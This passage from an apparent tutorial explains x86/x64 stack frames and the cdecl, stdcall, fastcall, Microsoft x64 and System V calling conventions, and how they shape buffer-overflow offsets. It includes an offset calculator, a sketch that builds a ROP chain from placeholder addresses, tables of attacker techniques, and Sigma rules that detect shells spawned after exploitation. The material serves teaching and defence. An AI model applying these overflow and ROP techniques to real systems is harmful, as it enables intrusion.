RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.
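
Because each RUNTIME_FUNCTION is just three little-endian 32-bit RVAs, a .pdata section can be decoded with a few lines of standard-library code. The sketch below works on raw bytes that are assumed to have been extracted already; the sample entries and the helper names are invented for illustration.

```python
import struct

ENTRY = struct.Struct("<III")   # BeginAddress, EndAddress, UnwindData (RVAs)

def parse_pdata(pdata: bytes) -> list:
    """Split raw .pdata bytes into (begin, end, unwind) RVA tuples."""
    usable = len(pdata) - len(pdata) % ENTRY.size
    return [ENTRY.unpack_from(pdata, off) for off in range(0, usable, ENTRY.size)]

def find_function(entries: list, rva: int):
    """Return the entry whose [begin, end) range covers `rva`, else None."""
    for begin, end, unwind in entries:
        if begin <= rva < end:
            return (begin, end, unwind)
    return None

# Two made-up entries, packed the way they would appear on disk.
sample = ENTRY.pack(0x1000, 0x1045, 0x3000) + ENTRY.pack(0x1050, 0x10C2, 0x300C)
entries = parse_pdata(sample)
print(find_function(entries, 0x1060), find_function(entries, 0x1048))
```

An instruction pointer inside an image that matches no entry belongs either to a leaf function or to something that is not a compiler-generated function at all, which is one reason unwind failures are worth logging.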


8. Reading Stack Frames in a Debugger

In WinDbg or x64dbg you read the live frame directly off RSP.

bp mymodule!vuln        ; break at the function
g                       ; run to it
dps rsp L10             ; dump 16 pointer-sized stack slots
r rsp, rbp, rip         ; show live pointers
k                       ; walk the call stack (uses unwind data)

dps rsp L10 prints the raw stack; the slot at [RSP] on entry (or [RSP+N] once the prologue has reserved N bytes) holds the saved return address, which k resolves to module!function+offset. A return address that resolves to no module, or to the stack itself, is the first sign of a hijacked frame.
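
The "resolves to no module" test is a simple range lookup. The sketch below shows the idea over a hypothetical module list; the base addresses and sizes are placeholders rather than values from a real process.

```python
def resolve(address: int, modules: dict):
    """Map an address to 'name+0xoffset' using {name: (base, size)},
    or return None when no loaded image contains it."""
    for name, (base, size) in modules.items():
        if base <= address < base + size:
            return f"{name}+{address - base:#x}"
    return None

# Hypothetical module list, in the spirit of what `lm` reports.
modules = {
    "mymodule": (0x00007FF6_12340000, 0x20000),
    "kernel32": (0x00007FFB_AAAA0000, 0xC0000),
}

print(resolve(0x00007FF6_12341A2B, modules))   # mymodule+0x1a2b
print(resolve(0x000000D4_F1AFF8C0, modules))   # None
```

The second address falls outside every image range, which is what a return address pointing into stack or heap memory looks like to triage tooling.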


9. How Stack Overflows Corrupt Frame Integrity

Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.

# Conceptual layout arithmetic, NOT a payload.
# 64-byte buffer sitting below the saved frame pointer and return address
# (no /GS cookie in this model).
buf_size      = 64
saved_rbp     = 8          # x86: 4
ret_addr_slot = 8          # x86: 4
offset_to_ret = buf_size + saved_rbp            # bytes before reaching the return slot
end_of_ret    = offset_to_ret + ret_addr_slot   # bytes that fully cover the return slot

print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")
print(f"bytes through return address: {end_of_ret}")

When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.


Figure: A stack overflow progresses deterministically from the buffer edge through the GS cookie and saved frame pointer to the return address, hijacking control at the next RET.

10. Modern Mitigations and What They Change About the Layout

Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.

// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
    char buf[64];
    // prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
    strcpy(buf, src);
    // epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}

Mitigation | Structural Effect
/GS stack cookie | __security_cookie placed between locals and saved return address; mismatch → __report_gsfailure
DEP / NX | IMAGE_DLLCHARACTERISTICS_NX_COMPAT; stack pages non-executable, blocking on-stack shellcode
ASLR | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; randomizes stack/image base, breaking hardcoded addresses
Control Flow Guard | IMAGE_GUARD_CF_INSTRUMENTED; validates indirect call targets
Intel CET Shadow Stack | CETCOMPAT mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites

11. Common Attacker Techniques

Technique | Description
Saved return-address overwrite | Overflow a local buffer to replace the saved return address ([RSP+frame size] on x64, [EBP+4] on x86) and redirect RET
Saved frame pointer overwrite | Corrupt saved RBP/EBP to desynchronize the frame chain or pivot
Stack pivot | Use a gadget (for example xchg rax, rsp; ret or leave; ret) to point RSP at attacker data
ROP chaining | Defeat DEP by chaining ret-terminated gadgets via the corrupted stack
SEH overwrite (x86) | Corrupt the exception handler chain on the stack to gain control on fault
Off-by-one / frame-pointer overwrite | Single-byte overflow to truncate or shift EBP, shifting subsequent frame math

These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.


12. Defensive Strategies & Detection

Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.

Signal | Detail
Windows Error Reporting | Access violation at abnormal RIP; dumps under %LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue; Application Event 1000/1001
Sysmon Event ID 1 | Unusual child process from document/browser renderers (T1203 follow-on)
Sysmon Event ID 10 | Cross-process handle opens requesting PROCESS_VM_READ, the precursor to stack reads via ReadProcessMemory
Security Event 4672 | Special privileges to an unexpected logon (T1068 follow-on)
ETW Microsoft-Windows-Kernel-Process | Anomalous RIP/RSP deltas via call-stack sampling (stack pivot)
ETW Microsoft-Windows-Security-Mitigations | Emits events when CFG, DEP, or Shadow Stack violations are blocked

A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:

title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high

Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.


13. MITRE ATT&CK Mapping

Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.

Technique | MITRE ID | Detection
Exploitation for Client Execution | T1203 | Sysmon EventID 1 renderer child chains; WER crash dumps
Exploitation for Privilege Escalation | T1068 | Security EventID 4672 unexpected source process
Exploit Public-Facing Application | T1190 | Service crash loops + WER on network-facing daemons
Reflective Code Loading | T1620 | ETW call-stack anomalies; non-image-backed RIP
Process Injection | T1055 | Sysmon EventID 8/10; abnormal cross-process access

14. Tools for Stack Analysis

Tool | Description | Link
WinDbg | Kernel/user debugging, k, dps, unwind walking | microsoft.com
x64dbg | Live user-mode stack inspection on x64/x86 | x64dbg.com
Godbolt Compiler Explorer | View prologue/epilogue and FPO across compilers | godbolt.org
Ghidra | Static reconstruction of frames and calling conventions | ghidra-sre.org
Process Hacker | Live thread stacks and call-stack walking | processhacker.sourceforge.io
NASM | Assemble illustrative prologue/epilogue snippets | nasm.us
GDB + pwndbg | Cross-platform frame and offset analysis | gdb.gnu.org

Summary

  • The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET — which is why it is the primary target of memory-safety exploits.
  • x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
  • The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
  • Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
  • Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.

x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V

Objective: Understand how the five major calling conventions — cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.


1. Why Calling Conventions Matter for Exploit Development

A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.

For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.


2. Stack Mechanics Refresher: PUSH, POP, CALL, RET

The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.

  • CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
  • RET pops that saved address back into the instruction pointer.
  • RET N pops the address and then adds N to ESP; this is how a callee cleans caller-pushed arguments.

push arg1          ; arg on stack
call foo           ; pushes return address, jumps to foo
add  esp, 4        ; caller cleans 1 dword arg (cdecl)

Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.
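To make the bookkeeping concrete, here is a minimal Python sketch of the four instructions acting on a toy 32-bit stack. The Stack32 class, its starting ESP of 0x1000, and the return address 0x401005 are illustrative assumptions, not a real emulator or real addresses.

```python
class Stack32:
    """Toy model of a downward-growing 32-bit stack (illustration only)."""

    def __init__(self, esp=0x1000):
        self.esp = esp
        self.mem = {}               # address -> dword

    def push(self, value):
        self.esp -= 4               # PUSH: decrement ESP, then write
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4               # POP: read, then increment ESP
        return value

    def call(self, return_address):
        self.push(return_address)   # CALL pushes the next instruction's address

    def ret(self, n=0):
        target = self.pop()         # RET pops the saved address...
        self.esp += n               # ...and RET N also discards N argument bytes
        return target


s = Stack32()
s.push(0x41)                        # push arg1
s.call(0x401005)                    # call foo
ret_slot = s.esp                    # the slot an overflow would need to reach
target = s.ret()                    # foo executes a bare RET
s.esp += 4                          # add esp, 4 (cdecl caller cleanup)
print(hex(ret_slot), hex(target), hex(s.esp))
```

Overwriting s.mem[ret_slot] before the ret() call changes the value RET returns, which is the whole control-flow hijack in miniature.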


3. x86 cdecl: The C Standard

__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.

Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.

; foo(1, 2, 3);  -- cdecl
push 3             ; rightmost first
push 2
push 1             ; leftmost last
call _foo
add  esp, 12       ; CALLER cleans 3 dwords

Canonical x86 stack frame at function entry (high → low address):

[arg N]          ← pushed first (rightmost)
[arg 2]
[arg 1]          ← pushed last (leftmost)
[return address] ← pushed by CALL
[saved EBP]      ← pushed by prologue (PUSH EBP)
[local vars]     ← ESP after SUB ESP, N

The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.
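The frame above can be expressed as EBP-relative offsets. The sketch below assumes a standard PUSH EBP / MOV EBP, ESP prologue, dword-sized arguments, and no canary or padding; cdecl_frame is a hypothetical helper name.

```python
def cdecl_frame(num_args, locals_size):
    """Return {slot name: offset from EBP} for a standard EBP-based frame."""
    frame = {"saved EBP": 0, "return address": 4}
    for i in range(1, num_args + 1):
        frame[f"arg {i}"] = 4 + 4 * i       # arg 1 at EBP+8, arg 2 at EBP+12, ...
    frame["locals start"] = -locals_size    # lowest address of the local area
    return frame


layout = cdecl_frame(num_args=3, locals_size=16)
# Print from high address to low, matching the diagram's orientation.
for name, off in sorted(layout.items(), key=lambda kv: -kv[1]):
    print(f"[EBP{off:+#x}] {name}")
```

The distance from "locals start" to "return address" is the number of bytes a write starting at the bottom of the locals must cover before it reaches the return slot.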


[Figure: x86 cdecl stack frame from high to low address: last argument, first argument, saved return address, saved EBP, then the local buffer where an overflow begins.]
In cdecl, overflowing a local buffer overwrites saved EBP and then the return address in exactly this order, which makes the offset deterministic.

4. x86 stdcall: The Windows API Convention

__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.

Name decoration encodes the byte count of stack arguments: a leading underscore, the function name, an @, then the argument size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.

; foo(1, 2);  -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
    ; ... body ...
    ret 8          ; CALLEE pops 8 bytes of args

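For shellcode and custom loaders, the @N suffix matters when resolving symbols and patching the Import Address Table: the name you look up must match the export exactly. System DLLs such as user32.dll export undecorated names (MessageBoxA), so the decorated form mostly appears in object files, import libraries, and DLLs built without a .def file.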


5. x86 fastcall: Register-Based Argument Passing

__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.

; foo(1, 2, 3);  -- MSVC fastcall
mov  ecx, 1        ; arg1 in ECX
mov  edx, 2        ; arg2 in EDX
push 3             ; arg3 on stack
call @foo@12

⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.
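The three MSVC x86 decoration schemes described so far fit in a few lines. This is a sketch for C linkage only (C++ mangling is a different scheme), and decorate is a hypothetical helper name.

```python
def decorate(name, convention, arg_bytes=0):
    """MSVC-style x86 C name decoration for cdecl, stdcall, and fastcall."""
    if convention == "cdecl":
        return f"_{name}"                   # leading underscore, no size suffix
    if arg_bytes % 4:
        raise ValueError("argument bytes must be a multiple of 4")
    if convention == "stdcall":
        return f"_{name}@{arg_bytes}"       # _name@N
    if convention == "fastcall":
        return f"@{name}@{arg_bytes}"       # @name@N, N counts register args too
    raise ValueError(f"unknown convention: {convention}")


print(decorate("foo", "cdecl"))               # _foo
print(decorate("MessageBoxA", "stdcall", 16)) # _MessageBoxA@16
print(decorate("foo", "fastcall", 12))        # @foo@12
```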


6. Microsoft x64 ABI: The Modern Windows Convention

On Windows x64 there is effectively one ABI; the /Gd, /Gr, and /Gz flags only affect x86 targets (the opt-in __vectorcall convention, /Gv, is the one exception). The convention is a four-register fastcall:

Argument slot   Integer register   Float register
1               RCX                XMM0
2               RDX                XMM1
3               R8                 XMM2
4               R9                 XMM3

Key rules:

  • One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
  • Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
  • Arguments beyond the first four go on the stack after the shadow space.
  • The stack must be 16-byte aligned before CALL.
  • The x87 register stack is unused by the convention and must be treated as volatile across calls; all floating-point work uses the 16 XMM registers.

Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.

; foo(a, b, c, d) -- Microsoft x64
mov  rcx, a
mov  rdx, b
mov  r8,  c
mov  r9,  d
; compilers normally reserve this once in the prologue, padded so RSP stays 16-byte aligned
sub  rsp, 20h      ; 32 bytes shadow space (caller's job)
call foo
add  rsp, 20h      ; reclaim shadow space

Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, RSP, R12–R15, XMM6–XMM15.
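The slot rules can be sketched as a small mapping function. It assumes every argument is a scalar classified as 'int' or 'float' (aggregates passed by reference count as 'int' pointers), and it reports stack locations relative to RSP at the moment of the CALL; ms_x64_args is a hypothetical helper name.

```python
INT_REGS = ["RCX", "RDX", "R8", "R9"]
FP_REGS = ["XMM0", "XMM1", "XMM2", "XMM3"]


def ms_x64_args(kinds):
    """Map argument kinds ('int' or 'float') to Microsoft x64 locations."""
    placement = []
    for slot, kind in enumerate(kinds):
        if slot < 4:
            # The slot index picks the register: ints and floats share numbering,
            # so a float in slot 2 uses XMM1 and RDX goes unused.
            placement.append(INT_REGS[slot] if kind == "int" else FP_REGS[slot])
        else:
            # Slots 5+ sit just above the 32-byte shadow space.
            placement.append(f"[RSP+{0x20 + 8 * (slot - 4):#x}]")
    return placement


print(ms_x64_args(["int", "float", "int", "float", "int", "int"]))
```

Note that the fifth argument lands at [RSP+0x20] even when the first four never touch the stack, because the shadow space is always reserved.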


[Figure: Microsoft x64 ABI stack layout showing stack arguments above the mandatory 32-byte shadow space, the saved return address written by CALL, and the callee local frame below, with registers RCX, RDX, R8, and R9 carrying the first four arguments.]
The mandatory 32-byte shadow space sits between the caller's stack arguments and the saved return address, so it shifts where stack-passed arguments and chained return addresses sit above the return slot, not the distance from a local buffer up to it.

7. System V AMD64 ABI: The Linux and macOS Convention

System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:

Argument slot   Integer register   Float register
1               RDI                XMM0
2               RSI                XMM1
3               RDX                XMM2
4               RCX                XMM3
5               R8                 XMM4–XMM7 (float args 5–8)
6               R9

Additional arguments are pushed onto the stack right to left. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.

  • Callee-saved: RBX, RBP, RSP, R12–R15. All others are caller-saved.
  • Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
  • Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
  • Varargs: for variadic functions, AL (the low byte of RAX) must hold an upper bound on the number of vector (XMM) registers used, 0–8.

; write(1, buf, len) via syscall -- System V
mov  rax, 1         ; sys_write
mov  rdi, 1         ; fd (arg1)
mov  rsi, buf       ; buffer (arg2)
mov  rdx, len       ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)

⚠️ Shadow space and the red zone are mutually exclusive and commonly confused. Shadow space (32 bytes directly above the return address) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.
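Unlike the Microsoft ABI, System V counts integer and floating-point arguments independently. The sketch below assumes scalar 'int' and 'float' arguments only (no struct classification) and reports overflow arguments relative to RSP just before the CALL; sysv_args is a hypothetical helper name.

```python
SYSV_INT = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]
SYSV_FP = [f"XMM{i}" for i in range(8)]


def sysv_args(kinds):
    """Return (locations, vector_count) for System V AMD64 scalar arguments."""
    placement = []
    ints = floats = stack = 0
    for kind in kinds:
        if kind == "int" and ints < len(SYSV_INT):
            placement.append(SYSV_INT[ints])    # next free integer register
            ints += 1
        elif kind == "float" and floats < len(SYSV_FP):
            placement.append(SYSV_FP[floats])   # next free vector register
            floats += 1
        else:
            placement.append(f"[RSP+{8 * stack:#x}]")  # spilled to the stack
            stack += 1
    # vector_count is the value a variadic call would place in AL.
    return placement, floats


print(sysv_args(["int", "float", "int", "float"]))
```

Compare with the Microsoft mapping: the same four arguments use RDI, XMM0, RSI, XMM1 here, with no register skipped.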


[Figure: side-by-side comparison of the System V AMD64 ABI and the Microsoft x64 ABI, highlighting differing argument registers, the System V red zone versus the Microsoft shadow space, and their shared 16-byte alignment requirement.]
Red zone and shadow space are mutually exclusive per-platform features; conflating them is a classic source of cross-platform shellcode crashes.

8. Side-by-Side Comparison and ABI Detection in Disassembly

Property                Microsoft x64                              System V AMD64
Integer arg registers   RCX, RDX, R8, R9                           RDI, RSI, RDX, RCX, R8, R9
FP arg registers        XMM0–XMM3                                  XMM0–XMM7
Shadow space            32 bytes (mandatory)                       None
Red zone                None                                       128 bytes below RSP
Callee-saved            RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15    RBX, RBP, R12–R15

Recognition heuristics in IDA/Ghidra:

  • A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9 ⇒ Microsoft x64.
  • Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rsp ⇒ System V (red zone).
  • A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
  • A bare ret with caller-side add esp, N ⇒ cdecl.

Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.
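As a rough illustration of the heuristics above, the following sketch guesses a convention from a few lines of disassembly text. It is deliberately naive: guess_convention is a hypothetical helper, the regexes assume Intel syntax, and real tools rely on far more context than this.

```python
import re


def guess_convention(call_site, callee_ret, bits):
    """Guess a convention from call-site lines and the callee's final RET."""
    text = "\n".join(line.lower() for line in call_site)
    if bits == 64:
        has_shadow = re.search(r"sub\s+rsp,\s*(0x20|20h)", text) is not None
        if has_shadow and re.search(r"mov\s+(rcx|rdx|r8|r9)\b", text):
            return "Microsoft x64"
        if re.search(r"mov\s+(rdi|rsi)\b", text):
            return "System V AMD64"
        return "unknown"
    ret = callee_ret.strip().lower()
    ret_n = re.fullmatch(r"ret\s+(\w+)", ret)
    if ret_n and ret_n.group(1) != "0":
        # Callee cleanup: register arguments separate fastcall from stdcall.
        if re.search(r"mov\s+(ecx|edx)\b", text):
            return "fastcall"
        return "stdcall"
    if ret == "ret" and re.search(r"add\s+esp,", text):
        return "cdecl"
    return "unknown"


print(guess_convention(["push 2", "push 1", "call _foo@8"], "ret 8", 32))
print(guess_convention(["mov rdi, 1", "mov rsi, buf", "call write"], "ret", 64))
```

Treat the result as a hint to verify against the real prologue, for the reasons given above.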


9. Calling Conventions as an Attack Surface

Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.

In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.
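To show how the ABI dictates the byte layout, the sketch below packs the three qwords that follow the padding in a single-argument System V call. Every value is a made-up placeholder (the offset 72 and all three addresses are assumptions, not taken from any real binary), and sysv_call_chain is a hypothetical helper name.

```python
import struct


def sysv_call_chain(offset_to_ret, pop_rdi_ret, arg1, func):
    """Lay out padding plus the qwords that overwrite and follow the return slot."""
    padding = b"A" * offset_to_ret      # filler up to the saved return address
    chain = struct.pack(
        "<QQQ",
        pop_rdi_ret,                    # lands on the return slot: pop rdi ; ret
        arg1,                           # popped into RDI (argument 1)
        func,                           # the gadget's RET transfers here
    )
    return padding + chain


# Placeholder values for illustration only.
payload = sysv_call_chain(72, 0x401234, 0x404000, 0x401050)
print(len(payload), payload[72:80].hex())
```

On a 32-bit cdecl target the argument would simply follow the return address on the stack; the extra gadget exists only because System V puts argument 1 in a register.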

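On Windows x64, the mandatory 32-byte shadow space changes what sits above the saved return address, not the distance from a local buffer up to it. The home space a caller reserves for its callee lies above the return address, and the home space a function reserves for its own callees lies below its locals. When a chain returns into an API function, that function treats the 32 bytes directly above its return slot as home space, so stack-passed arguments and the next chained address must skip them. Forgetting this is a classic source of off-by-32 errors when porting chains from Linux.

A conceptual offset calculator makes the dependency explicit:

def return_addr_offset(buf_size, conv, frame_pointer=True):
    # Bytes from the start of a local buffer to the saved return address,
    # assuming the buffer sits directly below the saved frame pointer
    # (no canary, padding, or other saved registers in between).
    saved_fp = {"x86_cdecl": 4, "x86_stdcall": 4,   # saved EBP
                "sysv_amd64": 8, "ms_x64": 8}       # saved RBP
    if conv not in saved_fp:
        raise ValueError("unknown convention")
    # Shadow space is deliberately absent: it lies above the return address.
    return buf_size + (saved_fp[conv] if frame_pointer else 0)

Frame-pointer presence changes the answer (-fomit-frame-pointer removes the saved RBP, and MSVC x64 code often keeps no RBP frame at all), as do canaries and alignment padding, which is why convention awareness and a look at the real prologue precede any reliable payload.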


[Figure: flow of a ROP chain on System V AMD64: the overflow redirects to a pop rdi ; ret gadget loading arg 1 into RDI, then a pop rsi ; ret gadget loading arg 2 into RSI, before jumping to a libc function.]
Every ROP gadget that loads a register is a direct consequence of the ABI: on System V you need pop rdi ; ret for arg 1 because the convention mandates RDI, not the stack.

10. Common Attacker Techniques

Technique                        Description
Saved return-address overwrite   Overflow a local buffer to clobber the convention-determined return slot
Return-to-libc (x86)             Stack-arranged args (cdecl) let an attacker call system() without shellcode
ROP register loading (x64)       Use pop rdi ; ret / pop rcx ; ret gadgets to satisfy the ABI before a call
Shadow-space-aware stack pivot   Account for the 32-byte home space when chaining Windows x64 gadgets
IAT patching via decoration      Resolve _func@N decorated stdcall imports for shellcode loaders
Reflective API calls             Manually set up RCX/RDX/R8/R9 + shadow space before invoking LoadLibraryA

Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.


11. Defensive Strategies & Detection

Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.

Compile-time mitigations motivated directly by convention layout:

  • Stack canaries: /GS (MSVC) and -fstack-protector-strong (GCC/Clang) detect a return-address overwrite before RET.
  • Control Flow Guard (/guard:cf) validates indirect CALL targets.
  • Intel CET / Shadow Stack: hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Mark binaries as compatible with the /CETCOMPAT linker option, which sets IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT (0x0001) in the extended DLL characteristics.
  • ASLR + PIE: randomizes addresses so a known layout still yields unknown absolute targets.
  • -mno-red-zone: disables the red zone; kernel code needs it because interrupt handlers run on the same stack and would clobber the area below RSP.

Runtime telemetry for the exploitation aftermath:

  • Sysmon Event ID 1 (Process Create): anomalous children of network-facing services after a successful ROP/return-to-libc chain.
  • Sysmon Event ID 10 (Process Access): cross-process handle opens with write or VM-operation rights, the precursor to VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
  • Sysmon Event ID 7 (Image Load): unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
  • Microsoft-Windows-Threat-Intelligence ETW: kernel telemetry on NtAllocateVirtualMemory / NtWriteVirtualMemory.
  • Audit Process Creation (Event 4688) with command-line logging.

title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\sqlservr.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
level: high
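To sanity-check the rule's logic against sample events before deploying it, the selection can be mirrored in a few lines of Python. This is a sketch, not a Sigma engine: matches_rule is a hypothetical helper, events are assumed to be plain dicts keyed by Sysmon field names, and lowercasing only approximates Sigma's case-insensitive matching.

```python
PARENTS = ("\\w3wp.exe", "\\sqlservr.exe")
CHILDREN = ("\\cmd.exe", "\\powershell.exe")


def matches_rule(event):
    """Apply the rule's selection to one Sysmon event given as a dict."""
    if event.get("EventID") != 1:
        return False
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    # str.endswith accepts a tuple, which mirrors Sigma's OR over a value list;
    # the two fields are ANDed, as they are inside a single selection.
    return parent.endswith(PARENTS) and image.endswith(CHILDREN)


sample = {
    "EventID": 1,
    "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
    "Image": r"C:\Windows\System32\cmd.exe",
}
print(matches_rule(sample))
```

Feeding known-benign process trees through the same function is a cheap way to estimate false positives, for example from administrative scripts that legitimately spawn shells under these services.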

12. Tools for Calling-Convention Analysis

Tool                        Description                                                Link
IDA Pro / Ghidra            Decompiler ABI inference and stack-frame reconstruction    ghidra-sre.org
x64dbg                      Live register/stack inspection on Windows                  x64dbg.com
GDB + pwndbg                Stack and register view on Linux (x/16gx $rsp)             gnu.org
WinDbg                      Inspect shadow space and frame layout (dd rsp)             microsoft.com
Godbolt Compiler Explorer   Compare emitted asm across conventions/compilers           godbolt.org
ROPgadget / Ropper          Enumerate pop rdi ; ret-style register-loading gadgets     github.com
NASM                        Hand-assemble convention test cases                        nasm.us
Radare2                     Cross-platform disassembly and ABI heuristics              rada.re

13. MITRE ATT&CK Mapping

Technique                           MITRE ID    Detection
Exploitation for Client Execution   T1203       Crash telemetry, Event 4688 child-process anomalies
Exploit Public-Facing Application   T1190       WAF/IDS, anomalous service children (Event ID 1)
Process Injection                   T1055       Sysmon Event ID 10 (VirtualAllocEx/WriteProcessMemory)
Process Injection: DLL Injection    T1055.001   Event ID 7 unexpected LoadLibraryA loads
Command and Scripting Interpreter   T1059       Event ID 1 cmd.exe/powershell.exe spawns
Reflective Code Loading             T1620       ETW Threat-Intelligence memory-write telemetry

ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.


Summary

  • Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
  • x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
